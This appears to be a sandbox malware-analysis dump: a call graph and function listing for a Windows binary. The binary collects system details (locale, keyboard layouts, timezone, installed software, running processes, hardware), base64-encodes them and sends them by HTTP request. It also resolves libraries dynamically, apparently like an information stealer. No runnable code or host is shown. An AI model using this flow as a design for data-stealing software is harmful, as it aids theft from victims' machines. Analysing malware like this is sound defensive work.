15026->15028 15029 bf5fb6 InternetCloseHandle 15026->15029 15030 c0a9b0 4 API calls 15028->15030 15029->14981 15031 bf5c1f 15030->15031 15032 c0a8a0 lstrcpy 15031->15032 15033 bf5c28 15032->15033 15034 c0a920 3 API calls 15033->15034 15035 bf5c46 15034->15035 15036 c0a8a0 lstrcpy 15035->15036 15037 bf5c4f 15036->15037 15038 c0a9b0 4 API calls 15037->15038 15039 bf5c6e 15038->15039 15040 c0a8a0 lstrcpy 15039->15040 15041 bf5c77 15040->15041 15042 c0a9b0 4 API calls 15041->15042 15043 bf5c98 15042->15043 15044 c0a8a0 lstrcpy 15043->15044 15045 bf5ca1 15044->15045 15046 c0a9b0 4 API calls 15045->15046 15047 bf5cc1 15046->15047 15048 c0a8a0 lstrcpy 15047->15048 15049 bf5cca 15048->15049 15050 c0a9b0 4 API calls 15049->15050 15051 bf5ce9 15050->15051 15052 c0a8a0 lstrcpy 15051->15052 15053 bf5cf2 15052->15053 15054 c0a920 3 API calls 15053->15054 15055 bf5d10 15054->15055 15056 c0a8a0 lstrcpy 15055->15056 15057 bf5d19 15056->15057 15058 c0a9b0 4 API calls 15057->15058 15059 bf5d38 15058->15059 15060 c0a8a0 lstrcpy 15059->15060 15061 bf5d41 15060->15061 15062 c0a9b0 4 API calls 15061->15062 15063 bf5d60 15062->15063 15064 c0a8a0 lstrcpy 15063->15064 15065 bf5d69 15064->15065 15066 c0a920 3 API calls 15065->15066 15067 bf5d87 15066->15067 15068 c0a8a0 lstrcpy 15067->15068 15069 bf5d90 15068->15069 15070 c0a9b0 4 API calls 15069->15070 15071 bf5daf 15070->15071 15072 c0a8a0 lstrcpy 15071->15072 15073 bf5db8 15072->15073 15074 c0a9b0 4 API calls 15073->15074 15075 bf5dd9 15074->15075 15076 c0a8a0 lstrcpy 15075->15076 15077 bf5de2 15076->15077 15078 c0a9b0 4 API calls 15077->15078 15079 bf5e02 15078->15079 15080 c0a8a0 lstrcpy 15079->15080 15081 bf5e0b 15080->15081 15082 c0a9b0 4 API calls 15081->15082 15083 bf5e2a 15082->15083 15084 c0a8a0 lstrcpy 15083->15084 15085 bf5e33 15084->15085 15086 c0a920 3 API calls 15085->15086 15087 bf5e54 15086->15087 15088 c0a8a0 lstrcpy 15087->15088 15089 bf5e5d 15088->15089 15090 bf5e70 lstrlen 15089->15090 15886 c0aad0 15090->15886 15092 bf5e81 lstrlen GetProcessHeap RtlAllocateHeap 15887 c0aad0 15092->15887 15094 bf5eae lstrlen 15095 bf5ebe 15094->15095 15096 bf5ed7 lstrlen 15095->15096 15097 bf5ee7 15096->15097 15098 bf5ef0 lstrlen 15097->15098 15099 bf5f04 15098->15099 15100 bf5f1a lstrlen 15099->15100 15888 c0aad0 15100->15888 15102 bf5f2a HttpSendRequestA 15103 bf5f35 InternetReadFile 15102->15103 15104 bf5f6a InternetCloseHandle 15103->15104 15108 bf5f61 15103->15108 15104->15029 15106 c0a9b0 4 API calls 15106->15108 15107 c0a8a0 lstrcpy 15107->15108 15108->15103 15108->15104 15108->15106 15108->15107 15111 c01077 15109->15111 15110 c01151 15110->13880 15111->15110 15112 c0a820 lstrlen lstrcpy 15111->15112 15112->15111 15115 c00db7 15113->15115 15114 c00f17 15114->13888 15115->15114 15116 c00ea4 StrCmpCA 15115->15116 15117 c00e27 StrCmpCA 15115->15117 15118 c00e67 StrCmpCA 15115->15118 15119 c0a820 lstrlen lstrcpy 15115->15119 15116->15115 15117->15115 15118->15115 15119->15115 15122 c00f67 15120->15122 15121 c01044 15121->13896 15122->15121 15123 c00fb2 StrCmpCA 15122->15123 15124 c0a820 lstrlen lstrcpy 15122->15124 15123->15122 15124->15122 15126 c0a740 lstrcpy 15125->15126 15127 c01a26 15126->15127 15128 c0a9b0 4 API calls 15127->15128 15129 c01a37 15128->15129 15130 c0a8a0 lstrcpy 15129->15130 15131 c01a40 15130->15131 15132 c0a9b0 4 API calls 15131->15132 15133 c01a5b 15132->15133 15134 c0a8a0 lstrcpy 15133->15134 15135 c01a64 15134->15135 15136 c0a9b0 4 API calls 15135->15136 15137 c01a7d 15136->15137 15138 c0a8a0 lstrcpy 15137->15138 15139 c01a86 15138->15139 15140 c0a9b0 4 API calls 15139->15140 15141 c01aa1 15140->15141 15142 c0a8a0 lstrcpy 15141->15142 15143 c01aaa 15142->15143 15144 c0a9b0 4 API calls 15143->15144 15145 c01ac3 15144->15145 15146 c0a8a0 lstrcpy 15145->15146 15147 c01acc 15146->15147 15148 c0a9b0 4 API calls 15147->15148 15149 c01ae7 15148->15149 15150 c0a8a0 lstrcpy 15149->15150 15151 c01af0 15150->15151 15152 c0a9b0 4 API calls 15151->15152 15153 c01b09 15152->15153 15154 c0a8a0 lstrcpy 15153->15154 15155 c01b12 15154->15155 15156 c0a9b0 4 API calls 15155->15156 15157 c01b2d 15156->15157 15158 c0a8a0 lstrcpy 15157->15158 15159 c01b36 15158->15159 15160 c0a9b0 4 API calls 15159->15160 15161 c01b4f 15160->15161 15162 c0a8a0 lstrcpy 15161->15162 15163 c01b58 15162->15163 15164 c0a9b0 4 API calls 15163->15164 15165 c01b76 15164->15165 15166 c0a8a0 lstrcpy 15165->15166 15167 c01b7f 15166->15167 15168 c07500 6 API calls 15167->15168 15169 c01b96 15168->15169 15170 c0a920 3 API calls 15169->15170 15171 c01ba9 15170->15171 15172 c0a8a0 lstrcpy 15171->15172 15173 c01bb2 15172->15173 15174 c0a9b0 4 API calls 15173->15174 15175 c01bdc 15174->15175 15176 c0a8a0 lstrcpy 15175->15176 15177 c01be5 15176->15177 15178 c0a9b0 4 API calls 15177->15178 15179 c01c05 15178->15179 15180 c0a8a0 lstrcpy 15179->15180 15181 c01c0e 15180->15181 15889 c07690 GetProcessHeap RtlAllocateHeap 15181->15889 15184 c0a9b0 4 API calls 15185 c01c2e 15184->15185 15186 c0a8a0 lstrcpy 15185->15186 15187 c01c37 15186->15187 15188 c0a9b0 4 API calls 15187->15188 15189 c01c56 15188->15189 15190 c0a8a0 lstrcpy 15189->15190 15191 c01c5f 15190->15191 15192 c0a9b0 4 API calls 15191->15192 15193 c01c80 15192->15193 15194 c0a8a0 lstrcpy 15193->15194 15195 c01c89 15194->15195 15896 c077c0 GetCurrentProcess IsWow64Process 15195->15896 15198 c0a9b0 4 API calls 15199 c01ca9 15198->15199 15200 c0a8a0 lstrcpy 15199->15200 15201 c01cb2 15200->15201 15202 c0a9b0 4 API calls 15201->15202 15203 c01cd1 15202->15203 15204 c0a8a0 lstrcpy 15203->15204 15205 c01cda 15204->15205 15206 c0a9b0 4 API calls 15205->15206 15207 c01cfb 15206->15207 15208 c0a8a0 lstrcpy 15207->15208 15209 c01d04 15208->15209 15210 c07850 3 API calls 15209->15210 15211 c01d14 15210->15211 15212 c0a9b0 4 API calls 15211->15212 15213 c01d24 15212->15213 15214 c0a8a0 lstrcpy 15213->15214 15215 c01d2d 15214->15215 15216 c0a9b0 4 API calls 15215->15216 15217 c01d4c 15216->15217 15218 c0a8a0 lstrcpy 15217->15218 15219 c01d55 15218->15219 15220 c0a9b0 4 API calls 15219->15220 15221 c01d75 15220->15221 15222 c0a8a0 lstrcpy 15221->15222 15223 c01d7e 15222->15223 15224 c078e0 3 API calls 15223->15224 15225 c01d8e 15224->15225 15226 c0a9b0 4 API calls 15225->15226 15227 c01d9e 15226->15227 15228 c0a8a0 lstrcpy 15227->15228 15229 c01da7 15228->15229 15230 c0a9b0 4 API calls 15229->15230 15231 c01dc6 15230->15231 15232 c0a8a0 lstrcpy 15231->15232 15233 c01dcf 15232->15233 15234 c0a9b0 4 API calls 15233->15234 15235 c01df0 15234->15235 15236 c0a8a0 lstrcpy 15235->15236 15237 c01df9 15236->15237 15898 c07980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 15237->15898 15240 c0a9b0 4 API calls 15241 c01e19 15240->15241 15242 c0a8a0 lstrcpy 15241->15242 15243 c01e22 15242->15243 15244 c0a9b0 4 API calls 15243->15244 15245 c01e41 15244->15245 15246 c0a8a0 lstrcpy 15245->15246 15247 c01e4a 15246->15247 15248 c0a9b0 4 API calls 15247->15248 15249 c01e6b 15248->15249 15250 c0a8a0 lstrcpy 15249->15250 15251 c01e74 15250->15251 15900 c07a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 15251->15900 15254 c0a9b0 4 API calls 15255 c01e94 15254->15255 15256 c0a8a0 lstrcpy 15255->15256 15257 c01e9d 15256->15257 15258 c0a9b0 4 API calls 15257->15258 15259 c01ebc 15258->15259 15260 c0a8a0 lstrcpy 15259->15260 15261 c01ec5 15260->15261 15262 c0a9b0 4 API calls 15261->15262 15263 c01ee5 15262->15263 15264 c0a8a0 lstrcpy 15263->15264 15265 c01eee 15264->15265 15903 c07b00 GetUserDefaultLocaleName 15265->15903 15268 c0a9b0 4 API calls 15269 c01f0e 15268->15269 15270 c0a8a0 lstrcpy 15269->15270 15271 c01f17 15270->15271 15272 c0a9b0 4 API calls 15271->15272 15273 c01f36 15272->15273 15274 c0a8a0 lstrcpy 15273->15274 15275 c01f3f 15274->15275 15276 c0a9b0 4 API calls 15275->15276 15277 c01f60 15276->15277 15278 c0a8a0 lstrcpy 15277->15278 15279 c01f69 15278->15279 15907 c07b90 15279->15907 15281 c01f80 15282 c0a920 3 API calls 15281->15282 15283 c01f93 15282->15283 15284 c0a8a0 lstrcpy 15283->15284 15285 c01f9c 15284->15285 15286 c0a9b0 4 API calls 15285->15286 15287 c01fc6 15286->15287 15288 c0a8a0 lstrcpy 15287->15288 15289 c01fcf 15288->15289 15290 c0a9b0 4 API calls 15289->15290 15291 c01fef 15290->15291 15292 c0a8a0 lstrcpy 15291->15292 15293 c01ff8 15292->15293 15919 c07d80 GetSystemPowerStatus 15293->15919 15296 c0a9b0 4 API calls 15297 c02018 15296->15297 15298 c0a8a0 lstrcpy 15297->15298 15299 c02021 15298->15299 15300 c0a9b0 4 API calls 15299->15300 15301 c02040 15300->15301 15302 c0a8a0 lstrcpy 15301->15302 15303 c02049 15302->15303 15304 c0a9b0 4 API calls 15303->15304 15305 c0206a 15304->15305 15306 c0a8a0 lstrcpy 15305->15306 15307 c02073 15306->15307 15308 c0207e GetCurrentProcessId 15307->15308 15921 c09470 OpenProcess 15308->15921 15311 c0a920 3 API calls 15312 c020a4 15311->15312 15313 c0a8a0 lstrcpy 15312->15313 15314 c020ad 15313->15314 15315 c0a9b0 4 API calls 15314->15315 15316 c020d7 15315->15316 15317 c0a8a0 lstrcpy 15316->15317 15318 c020e0 15317->15318 15319 c0a9b0 4 API calls 15318->15319 15320 c02100 15319->15320 15321 c0a8a0 lstrcpy 15320->15321 15322 c02109 15321->15322 15926 c07e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15322->15926 15325 c0a9b0 4 API calls 15326 c02129 15325->15326 15327 c0a8a0 lstrcpy 15326->15327 15328 c02132 15327->15328 15329 c0a9b0 4 API calls 15328->15329 15330 c02151 15329->15330 15331 c0a8a0 lstrcpy 15330->15331 15332 c0215a 15331->15332 15333 c0a9b0 4 API calls 15332->15333 15334 c0217b 15333->15334 15335 c0a8a0 lstrcpy 15334->15335 15336 c02184 15335->15336 15930 c07f60 15336->15930 15339 c0a9b0 4 API calls 15340 c021a4 15339->15340 15341 c0a8a0 lstrcpy 15340->15341 15342 c021ad 15341->15342 15343 c0a9b0 4 API calls 15342->15343 15344 c021cc 15343->15344 15345 c0a8a0 lstrcpy 15344->15345 15346 c021d5 15345->15346 15347 c0a9b0 4 API calls 15346->15347 15348 c021f6 15347->15348 15349 c0a8a0 lstrcpy 15348->15349 15350 c021ff 15349->15350 15943 c07ed0 GetSystemInfo wsprintfA 15350->15943 15353 c0a9b0 4 API calls 15354 c0221f 15353->15354 15355 c0a8a0 lstrcpy 15354->15355 15356 c02228 15355->15356 15357 c0a9b0 4 API calls 15356->15357 15358 c02247 15357->15358 15359 c0a8a0 lstrcpy 15358->15359 15360 c02250 15359->15360 15361 c0a9b0 4 API calls 15360->15361 15362 c02270 15361->15362 15363 c0a8a0 lstrcpy 15362->15363 15364 c02279 15363->15364 15945 c08100 GetProcessHeap RtlAllocateHeap 15364->15945 15367 c0a9b0 4 API calls 15368 c02299 15367->15368 15369 c0a8a0 lstrcpy 15368->15369 15370 c022a2 15369->15370 15371 c0a9b0 4 API calls 15370->15371 15372 c022c1 15371->15372 15373 c0a8a0 lstrcpy 15372->15373 15374 c022ca 15373->15374 15375 c0a9b0 4 API calls 15374->15375 15376 c022eb 15375->15376 15377 c0a8a0 lstrcpy 15376->15377 15378 c022f4 15377->15378 15951 c087c0 15378->15951 15381 c0a920 3 API calls 15382 c0231e 15381->15382 15383 c0a8a0 lstrcpy 15382->15383 15384 c02327 15383->15384 15385 c0a9b0 4 API calls 15384->15385 15386 c02351 15385->15386 15387 c0a8a0 lstrcpy 15386->15387 15388 c0235a 15387->15388 15389 c0a9b0 4 API calls 15388->15389 15390 c0237a 15389->15390 15391 c0a8a0 lstrcpy 15390->15391 15392 c02383 15391->15392 15393 c0a9b0 4 API calls 15392->15393 15394 c023a2 15393->15394 15395 c0a8a0 lstrcpy 15394->15395 15396 c023ab 15395->15396 15956 c081f0 15396->15956 15398 c023c2 15399 c0a920 3 API calls 15398->15399 15400 c023d5 15399->15400 15401 c0a8a0 lstrcpy 15400->15401 15402 c023de 15401->15402 15403 c0a9b0 4 API calls 15402->15403 15404 c0240a 15403->15404 15405 c0a8a0 lstrcpy 15404->15405 15406 c02413 15405->15406 15407 c0a9b0 4 API calls 15406->15407 15408 c02432 15407->15408 15409 c0a8a0 lstrcpy 15408->15409 15410 c0243b 15409->15410 15411 c0a9b0 4 API calls 15410->15411 15412 c0245c 15411->15412 15413 c0a8a0 lstrcpy 15412->15413 15414 c02465 15413->15414 15415 c0a9b0 4 API calls 15414->15415 15416 c02484 15415->15416 15417 c0a8a0 lstrcpy 15416->15417 15418 c0248d 15417->15418 15419 c0a9b0 4 API calls 15418->15419 15420 c024ae 15419->15420 15421 c0a8a0 lstrcpy 15420->15421 15422 c024b7 15421->15422 15964 c08320 15422->15964 15424 c024d3 15425 c0a920 3 API calls 15424->15425 15426 c024e6 15425->15426 15427 c0a8a0 lstrcpy 15426->15427 15428 c024ef 15427->15428 15429 c0a9b0 4 API calls 15428->15429 15430 c02519 15429->15430 15431 c0a8a0 lstrcpy 15430->15431 15432 c02522 15431->15432 15433 c0a9b0 4 API calls 15432->15433 15434 c02543 15433->15434 15435 c0a8a0 lstrcpy 15434->15435 15436 c0254c 15435->15436 15437 c08320 17 API calls 15436->15437 15438 c02568 15437->15438 15439 c0a920 3 API calls 15438->15439 15440 c0257b 15439->15440 15441 c0a8a0 lstrcpy 15440->15441 15442 c02584 15441->15442 15443 c0a9b0 4 API calls 15442->15443 15444 c025ae 15443->15444 15445 c0a8a0 lstrcpy 15444->15445 15446 c025b7 15445->15446 15447 c0a9b0 4 API calls 15446->15447 15448 c025d6 15447->15448 15449 c0a8a0 lstrcpy 15448->15449 15450 c025df 15449->15450 15451 c0a9b0 4 API calls 15450->15451 15452 c02600 15451->15452 15453 c0a8a0 lstrcpy 15452->15453 15454 c02609 15453->15454 16000 c08680 15454->16000 15456 c02620 15457 c0a920 3 API calls 15456->15457 15458 c02633 15457->15458 15459 c0a8a0 lstrcpy 15458->15459 15460 c0263c 15459->15460 15461 c0265a lstrlen 15460->15461 15462 c0266a 15461->15462 15463 c0a740 lstrcpy 15462->15463 15464 c0267c 15463->15464 15465 bf1590 lstrcpy 15464->15465 15466 c0268d 15465->15466 16010 c05190 15466->16010 15468 c02699 15468->13900 16198 c0aad0 15469->16198 15471 bf5009 InternetOpenUrlA 15475 bf5021 15471->15475 15472 bf502a InternetReadFile 15472->15475 15473 bf50a0 InternetCloseHandle InternetCloseHandle 15474 bf50ec 15473->15474 15474->13904 15475->15472 15475->15473 16199 bf98d0 15476->16199 15478 c00759 15479 c00a38 15478->15479 15480 c0077d 15478->15480 15481 bf1590 lstrcpy 15479->15481 15482 c00799 StrCmpCA 15480->15482 15483 c00a49 15481->15483 15484 c007a8 15482->15484 15485 c00843 15482->15485 16375 c00250 15483->16375 15487 c0a7a0 lstrcpy 15484->15487 15490 c00865 StrCmpCA 15485->15490 15489 c007c3 15487->15489 15492 bf1590 lstrcpy 15489->15492 15491 c00874 15490->15491 15528 c0096b 15490->15528 15493 c0a740 lstrcpy 15491->15493 15494 c0080c 15492->15494 15496 c00881 15493->15496 15497 c0a7a0 lstrcpy 15494->15497 15495 c0099c StrCmpCA 15498 c00a2d 15495->15498 15499 c009ab 15495->15499 15500 c0a9b0 4 API calls 15496->15500 15501 c00823 15497->15501 15498->13908 15502 bf1590 lstrcpy 15499->15502 15503 c008ac 15500->15503 15504 c0a7a0 lstrcpy 15501->15504 15505 c009f4 15502->15505 15506 c0a920 3 API calls 15503->15506 15507 c0083e 15504->15507 15508 c0a7a0 lstrcpy 15505->15508 15509 c008b3 15506->15509 16202 bffb00 15507->16202 15511 c00a0d 15508->15511 15512 c0a9b0 4 API calls 15509->15512 15513 c0a7a0 lstrcpy 15511->15513 15514 c008ba 15512->15514 15515 c00a28 15513->15515 15528->15495 15850 c0a7a0 lstrcpy 15849->15850 15851 bf1683 15850->15851 15852 c0a7a0 lstrcpy 15851->15852 15853 bf1695 15852->15853 15854 c0a7a0 lstrcpy 15853->15854 15855 bf16a7 15854->15855 15856 c0a7a0 lstrcpy 15855->15856 15857 bf15a3 15856->15857 15857->14731 15859 bf47c6 15858->15859 15860 bf4838 lstrlen 15859->15860 15884 c0aad0 15860->15884 15862 bf4848 InternetCrackUrlA 15863 bf4867 15862->15863 15863->14808 15865 c0a740 lstrcpy 15864->15865 15866 c08b74 15865->15866 15867 c0a740 lstrcpy 15866->15867 15868 c08b82 GetSystemTime 15867->15868 15869 c08b99 15868->15869 15870 c0a7a0 lstrcpy 15869->15870 15871 c08bfc 15870->15871 15871->14823 15874 c0a931 15872->15874 15873 c0a988 15875 c0a7a0 lstrcpy 15873->15875 15874->15873 15876 c0a968 lstrcpy lstrcat 15874->15876 15877 c0a994 15875->15877 15876->15873 15877->14826 15878->14941 15880 bf4eee 15879->15880 15881 bf9af9 LocalAlloc 15879->15881 15880->14829 15880->14837 15881->15880 15882 bf9b14 CryptStringToBinaryA 15881->15882 15882->15880 15883 bf9b39 LocalFree 15882->15883 15883->15880 15884->15862 15885->14951 15886->15092 15887->15094 15888->15102 16017 c077a0 15889->16017 15892 c076c6 RegOpenKeyExA 15894 c07704 RegCloseKey 15892->15894 15895 c076e7 RegQueryValueExA 15892->15895 15893 c01c1e 15893->15184 15894->15893 15895->15894 15897 c01c99 15896->15897 15897->15198 15899 c01e09 15898->15899 15899->15240 15901 c07a9a wsprintfA 15900->15901 15902 c01e84 15900->15902 15901->15902 15902->15254 15904 c01efe 15903->15904 15905 c07b4d 15903->15905 15904->15268 16024 c08d20 LocalAlloc CharToOemW 15905->16024 15908 c0a740 lstrcpy 15907->15908 15909 c07bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15908->15909 15910 c07c25 15909->15910 15911 c07c46 GetLocaleInfoA 15910->15911 15912 c07d18 15910->15912 15916 c0a8a0 lstrcpy 15910->15916 15917 c0a9b0 lstrcpy lstrlen lstrcpy lstrcat 15910->15917 15911->15910 15913 c07d28 15912->15913 15914 c07d1e LocalFree 15912->15914 15915 c0a7a0 lstrcpy 15913->15915 15914->15913 15918 c07d37 15915->15918 15916->15910 15917->15910 15918->15281 15920 c02008 15919->15920 15920->15296 15922 c09493 GetModuleFileNameExA CloseHandle 15921->15922 15923 c094b5 15921->15923 15922->15923 15924 c0a740 lstrcpy 15923->15924 15925 c02091 15924->15925 15925->15311 15927 c02119 15926->15927 15928 c07e68 RegQueryValueExA 15926->15928 15927->15325 15929 c07e8e RegCloseKey 15928->15929 15929->15927 15931 c07fb9 GetLogicalProcessorInformationEx 15930->15931 15932 c07fd8 GetLastError 15931->15932 15933 c08029 15931->15933 15937 c07fe3 15932->15937 15942 c08022 15932->15942 15936 c089f0 2 API calls 15933->15936 15940 c0807b 15936->15940 15937->15931 15939 c02194 15937->15939 16025 c089f0 15937->16025 16028 c08a10 GetProcessHeap RtlAllocateHeap 15937->16028 15938 c089f0 2 API calls 15938->15939 15939->15339 15941 c08084 wsprintfA 15940->15941 15940->15942 15941->15939 15942->15938 15942->15939 15944 c0220f 15943->15944 15944->15353 15946 c089b0 15945->15946 15947 c0814d GlobalMemoryStatusEx 15946->15947 15948 c08163 15947->15948 15949 c0819b wsprintfA 15948->15949 15950 c02289 15949->15950 15950->15367 15952 c087fb GetProcessHeap RtlAllocateHeap wsprintfA 15951->15952 15954 c0a740 lstrcpy 15952->15954 15955 c0230b 15954->15955 15955->15381 15957 c0a740 lstrcpy 15956->15957 15959 c08229 15957->15959 15958 c08263 15960 c0a7a0 lstrcpy 15958->15960 15959->15958 15962 c0a9b0 lstrcpy lstrlen lstrcpy lstrcat 15959->15962 15963 c0a8a0 lstrcpy 15959->15963 15961 c082dc 15960->15961 15961->15398 15962->15959 15963->15959 15965 c0a740 lstrcpy 15964->15965 15966 c0835c RegOpenKeyExA 15965->15966 15967 c083d0 15966->15967 15968 c083ae 15966->15968 15970 c08613 RegCloseKey 15967->15970 15971 c083f8 RegEnumKeyExA 15967->15971 15969 c0a7a0 lstrcpy 15968->15969 15981 c083bd 15969->15981 15972 c0a7a0 lstrcpy 15970->15972 15973 c0860e 15971->15973 15974 c0843f wsprintfA RegOpenKeyExA 15971->15974 15972->15981 15973->15970 15975 c084c1 RegQueryValueExA 15974->15975 15976 c08485 RegCloseKey RegCloseKey 15974->15976 15977 c08601 RegCloseKey 15975->15977 15978 c084fa lstrlen 15975->15978 15979 c0a7a0 lstrcpy 15976->15979 15977->15973 15978->15977 15980 c08510 15978->15980 15979->15981 15982 c0a9b0 4 API calls 15980->15982 15981->15424 15983 c08527 15982->15983 15984 c0a8a0 lstrcpy 15983->15984 15985 c08533 15984->15985 15986 c0a9b0 4 API calls 15985->15986 15987 c08557 15986->15987 15988 c0a8a0 lstrcpy 15987->15988 15989 c08563 15988->15989 15990 c0856e RegQueryValueExA 15989->15990 15990->15977 15991 c085a3 15990->15991 15992 c0a9b0 4 API calls 15991->15992 15993 c085ba 15992->15993 15994 c0a8a0 lstrcpy 15993->15994 15995 c085c6 15994->15995 15996 c0a9b0 4 API calls 15995->15996 15997 c085ea 15996->15997 15998 c0a8a0 lstrcpy 15997->15998 15999 c085f6 15998->15999 15999->15977 16001 c0a740 lstrcpy 16000->16001 16002 c086bc CreateToolhelp32Snapshot Process32First 16001->16002 16003 c086e8 Process32Next 16002->16003 16004 c0875d CloseHandle 16002->16004 16003->16004 16006 c086fd 16003->16006 16005 c0a7a0 lstrcpy 16004->16005 16007 c08776 16005->16007 16006->16003 16008 c0a9b0 lstrcpy lstrlen lstrcpy lstrcat 16006->16008 16009 c0a8a0 lstrcpy 16006->16009 16007->15456 16008->16006 16009->16006 16011 c0a7a0 lstrcpy 16010->16011 16012 c051b5 16011->16012 16013 bf1590 lstrcpy 16012->16013 16014 c051c6 16013->16014 16029 bf5100 16014->16029 16016 c051cf 16016->15468 16020 c07720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 16017->16020 16019 c076b9 16019->15892 16019->15893 16021 c07780 RegCloseKey 16020->16021 16022 c07765 RegQueryValueExA 16020->16022 16023 c07793 16021->16023 16022->16021 16023->16019 16024->15904 16026 c089f9 GetProcessHeap HeapFree 16025->16026 16027 c08a0c 16025->16027 16026->16027 16027->15937 16028->15937 16030 c0a7a0 lstrcpy 16029->16030 16031 bf5119 16030->16031 16032 bf47b0 2 API calls 16031->16032 16033 bf5125 16032->16033 16189 c08ea0 16033->16189 16035 bf5184 16036 bf5192 lstrlen 16035->16036 16037 bf51a5 16036->16037 16038 c08ea0 4 API calls 16037->16038 16039 bf51b6 16038->16039 16040 c0a740 lstrcpy 16039->16040 16041 bf51c9 16040->16041 16042 c0a740 lstrcpy 16041->16042 16043 bf51d6 16042->16043 16044 c0a740 lstrcpy 16043->16044 16045 bf51e3 16044->16045 16046 c0a740 lstrcpy 16045->16046 16047 bf51f0 16046->16047 16048 c0a740 lstrcpy 16047->16048 16049 bf51fd InternetOpenA StrCmpCA 16048->16049 16050 bf522f 16049->16050 16051 bf58c4 InternetCloseHandle 16050->16051 16052 c08b60 3 API calls 16050->16052 16058 bf58d9 codecvt 16051->16058 16053 bf524e 16052->16053 16054 c0a920 3 API calls 16053->16054 16055 bf5261 16054->16055 16056 c0a8a0 lstrcpy 16055->16056 16057 bf526a 16056->16057 16059 c0a9b0 4 API calls 16057->16059 16062 c0a7a0 lstrcpy 16058->16062 16060 bf52ab 16059->16060 16061 c0a920 3 API calls 16060->16061 16063 bf52b2 16061->16063 16071 bf5913 16062->16071 16064 c0a9b0 4 API calls 16063->16064 16065 bf52b9 16064->16065 16066 c0a8a0 lstrcpy 16065->16066 16067 bf52c2 16066->16067 16068 c0a9b0 4 API calls 16067->16068 16069 bf5303 16068->16069 16070 c0a920 3 API calls 16069->16070 16072 bf530a 16070->16072 16071->16016 16073 c0a8a0 lstrcpy 16072->16073 16074 bf5313 16073->16074 16075 bf5329 InternetConnectA 16074->16075 16075->16051 16076 bf5359 HttpOpenRequestA 16075->16076 16078 bf58b7 InternetCloseHandle 16076->16078 16079 bf53b7 16076->16079 16078->16051 16080 c0a9b0 4 API calls 16079->16080 16081 bf53cb 16080->16081 16082 c0a8a0 lstrcpy 16081->16082 16083 bf53d4 16082->16083 16084 c0a920 3 API calls 16083->16084 16085 bf53f2 16084->16085 16086 c0a8a0 lstrcpy 16085->16086 16087 bf53fb 16086->16087 16088 c0a9b0 4 API calls 16087->16088 16089 bf541a 16088->16089 16090 c0a8a0 lstrcpy 16089->16090 16091 bf5423 16090->16091 16092 c0a9b0 4 API calls 16091->16092 16093 bf5444 16092->16093 16094 c0a8a0 lstrcpy 16093->16094 16095 bf544d 16094->16095 16096 c0a9b0 4 API calls 16095->16096 16097 bf546e 16096->16097 16098 c0a8a0 lstrcpy 16097->16098 16190 c08ea9 16189->16190 16191 c08ead CryptBinaryToStringA 16189->16191 16190->16035 16191->16190 16192 c08ece GetProcessHeap RtlAllocateHeap 16191->16192 16192->16190 16193 c08ef4 codecvt 16192->16193 16194 c08f05 CryptBinaryToStringA 16193->16194 16194->16190 16198->15471 16441 bf9880 16199->16441 16201 bf98e1 16201->15478 16203 c0a740 lstrcpy 16202->16203 16376 c0a740 lstrcpy 16375->16376 16377 c00266 16376->16377 16378 c08de0 2 API calls 16377->16378 16379 c0027b 16378->16379 16380 c0a920 3 API calls 16379->16380 16381 c0028b 16380->16381 16382 c0a8a0 lstrcpy 16381->16382 16383 c00294 16382->16383 16384 c0a9b0 4 API calls 16383->16384 16385 c002b8 16384->16385 16442 bf988e 16441->16442 16445 bf6fb0 16442->16445 16444 bf98ad codecvt 16444->16201 16448 bf6d40 16445->16448 16449 bf6d63 16448->16449 16450 bf6d59 16448->16450 16464 bf6530 16449->16464 16450->16444 16454 bf6dbe 16454->16450 16474 bf69b0 16454->16474 16456 bf6e2a 16456->16450 16457 bf6ee6 VirtualFree 16456->16457 16459 bf6ef7 16456->16459 16457->16459 16458 bf6f41 16458->16450 16460 c089f0 2 API calls 16458->16460 16459->16458 16461 bf6f38 16459->16461 16462 bf6f26 FreeLibrary 16459->16462 16460->16450 16463 c089f0 2 API calls 16461->16463 16462->16459 16463->16458 16465 bf6542 16464->16465 16467 bf6549 16465->16467 16484 c08a10 GetProcessHeap RtlAllocateHeap 16465->16484 16467->16450 16468 bf6660 16467->16468 16473 bf668f VirtualAlloc 16468->16473 16470 bf6730 16471 bf673c 16470->16471 16472 bf6743 VirtualAlloc 16470->16472 16471->16454 16472->16471 16473->16470 16473->16471 16475 bf69c9 16474->16475 16480 bf69d5 16474->16480 16476 bf6a09 LoadLibraryA 16475->16476 16475->16480 16477 bf6a32 16476->16477 16476->16480 16483 bf6ae0 16477->16483 16485 c08a10 GetProcessHeap RtlAllocateHeap 16477->16485 16479 bf6ba8 GetProcAddress 16479->16480 16479->16483 16480->16456 16481 c089f0 2 API calls 16481->16483 16482 bf6a8b 16482->16480 16482->16481 16483->16479 16483->16480 16484->16467 16485->16482

                          Executed Functions

                          Function 00C09860 Relevance: 63.2, APIs: 33, Strings: 3, Instructions: 212libraryloaderCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 660 c09860-c09874 call c09750 663 c09a93-c09af2 LoadLibraryA * 5 660->663 664 c0987a-c09a8e call c09780 GetProcAddress * 21 660->664 665 c09af4-c09b08 GetProcAddress 663->665 666 c09b0d-c09b14 663->666 664->663 665->666 669 c09b46-c09b4d 666->669 670 c09b16-c09b41 GetProcAddress * 2 666->670 671 c09b68-c09b6f 669->671 672 c09b4f-c09b63 GetProcAddress 669->672 670->669 673 c09b71-c09b84 GetProcAddress 671->673 674 c09b89-c09b90 671->674 672->671 673->674 675 c09bc1-c09bc2 674->675 676 c09b92-c09bbc GetProcAddress * 2 674->676 676->675
                          APIs
                          • GetProcAddress.KERNEL32(75900000,006E0588), ref: 00C098A1
                          • GetProcAddress.KERNEL32(75900000,006E05A0), ref: 00C098BA
                          • GetProcAddress.KERNEL32(75900000,006E06C0), ref: 00C098D2
                          • GetProcAddress.KERNEL32(75900000,006E05B8), ref: 00C098EA
                          • GetProcAddress.KERNEL32(75900000,006E0690), ref: 00C09903
                          • GetProcAddress.KERNEL32(75900000,006E87F0), ref: 00C0991B
                          • GetProcAddress.KERNEL32(75900000,006D66A0), ref: 00C09933
                          • GetProcAddress.KERNEL32(75900000,006D6A20), ref: 00C0994C
